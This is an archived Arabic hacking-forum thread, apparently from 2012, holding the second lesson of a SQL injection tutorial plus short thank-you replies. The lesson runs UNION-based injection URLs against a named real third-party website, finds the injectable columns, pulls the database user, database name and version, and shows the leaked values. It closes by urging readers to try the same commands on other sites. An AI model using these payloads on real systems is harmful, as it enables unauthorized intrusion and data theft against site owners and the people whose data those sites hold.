:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه (http://www.vbspiders.com/vb/t63219.html)

jasem1 07-05-2012 08:49 PM

تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
 
[
السلام عليكم ورحمة الله وبركاته
الشرح مقدم للأخ هيثم وباقي اعضاء المنتدى الكريم
كنت قد شرحت في درس الامس
طريقة اكتشاف ثغرة سيكول (sql injection)
====================
ووعدتكم بالانتقال الى مرحلة اخرى وهي اكتشاف العمود المصاب
وتطبيق بعض الاوامر عليه ...
====================
أما الدرس القادم والاخير غدا ان شاء الله
اعرف ان هناك شروحات مميزة للاخوة المحترفين وتفوق شرحي بكثير لكن انا اردت كسر الهوه بين المحترف والمبتدء
نبدأ على بركة الله....
لنأخذ الموقع التالي
[html]http://www.dsasummercamp.edu.gr/news.php?id=123[/html]نريد ان نعرف ماهو الجدول المصاب والذي سوف نسحب من المعلومات
في الدرس السابق عرفنا ان عدد الجداول 5
وعندها سنستخدم الامر التالي :
كود:

union+select
عدد الجداول 5 كما قلنا فيصبح الامر على الشكل التالي
كود:

union+select+1,2,3,4,5--
اي ان الرابط يصبح على الشكل التالي
كود:

http://www.dsasummercamp.edu.gr/news.php?id=123+union+select+1,2,3,4,5--
وقلنا ان اشارة -- اخر الرابط كي تستجيب القاعده لامرنا
نضع هذا الرابط في المتصفح لنرى الجدول المصاب من بين هذه الجداول ال5 ....
وضعته لكن لم يظهر اي شيء
طيب ما الحل ؟!! الحل ان اضع اشارة - بعد ال=
يعني يصبح الرابط :
كود:

http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,2,3,4,5--
انظروا ماذا ظهر لي ... ?!
انظر الصورة :http://rita.webuda.com/imags/3.png
ظهر لي الاعمده
2
4
5
يعني ان الجدول 2 و4 و5 مصابات ونستطيع سحب المعلومات من اي جدول نريده من بين هذه الجداول
والان دعونا نطبق بعض الاوامر
لمعرفة اسم المستخدم لهذه القاعده نضع
الامر التالي :

كود:

user()
مكان الجدول المصاب وليكن الجدول رقم 2
فيصبح الرابط على الشكل التالي
كود:

http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,user%28%29,3,4,5--
وظهر لنا : itis_dsa@localhost
انظر الصورة :
http://rita.webuda.com/imags/4.png
طيب نريد اسم القاعده فنضع الامر التالي مكان العمود المصاب
كود:

database()
فيصبح الرابط :
كود:

http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,database%28%29,3,4,5--
فظهر لنا :itis_dsa
طيب نريد ان نرى اصدار القاعده
نستخدم الامر التالي
كود:

version()
ليصبح الرابط على الشكل التالي
كود:

http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,version%28%29,3,4,5--
فظهر لنا الاصدار وهو :5.1.63
طيب اذا اردت الاستعلام عن الاصدار واسم المستخدم واسم القاعده استخدم هذا الامر
كود:

concat(user(),0x3a3a,database(),0x3a3a,version())
ماذا يعني هذا؟
هذا الامر concat لجمع عدة اوامر مع بعضها

0x3a3a
هذه العلامة سوف تفصل بين اسم القاعده واسم المستخدم والاصدار وهي مشفره بالهيكسس وتعني العلامة التاليه :
كود:

::
ماذا ظهر لي ؟
itis_dsa@localhost::itis_dsa::5.1.63
انظر الصورة :
http://rita.webuda.com/imags/5.png
اترك لكم الان التطبيق على عدد من المواقع وتطبيق هذه الاوامر للانتقال الى المرحله الاخيره
انتهى الدرس الثاني
استودعكم الله
لكم تحيات اخوكم the punisher

topo18 07-09-2012 06:29 PM

رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
 
merci khoya t le seul li kay3raf yfaham ta wa7ed mafhmt chkaydire hna mn ghirek merci

هكر مخربها 07-11-2012 03:14 AM

رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
 
يعطيك العافية يابطل

mido spox 07-14-2012 03:12 PM

رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
 
merci Khoya bezzaf Lah Ir7am Lwalidin kamal


الساعة الآن 03:40 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0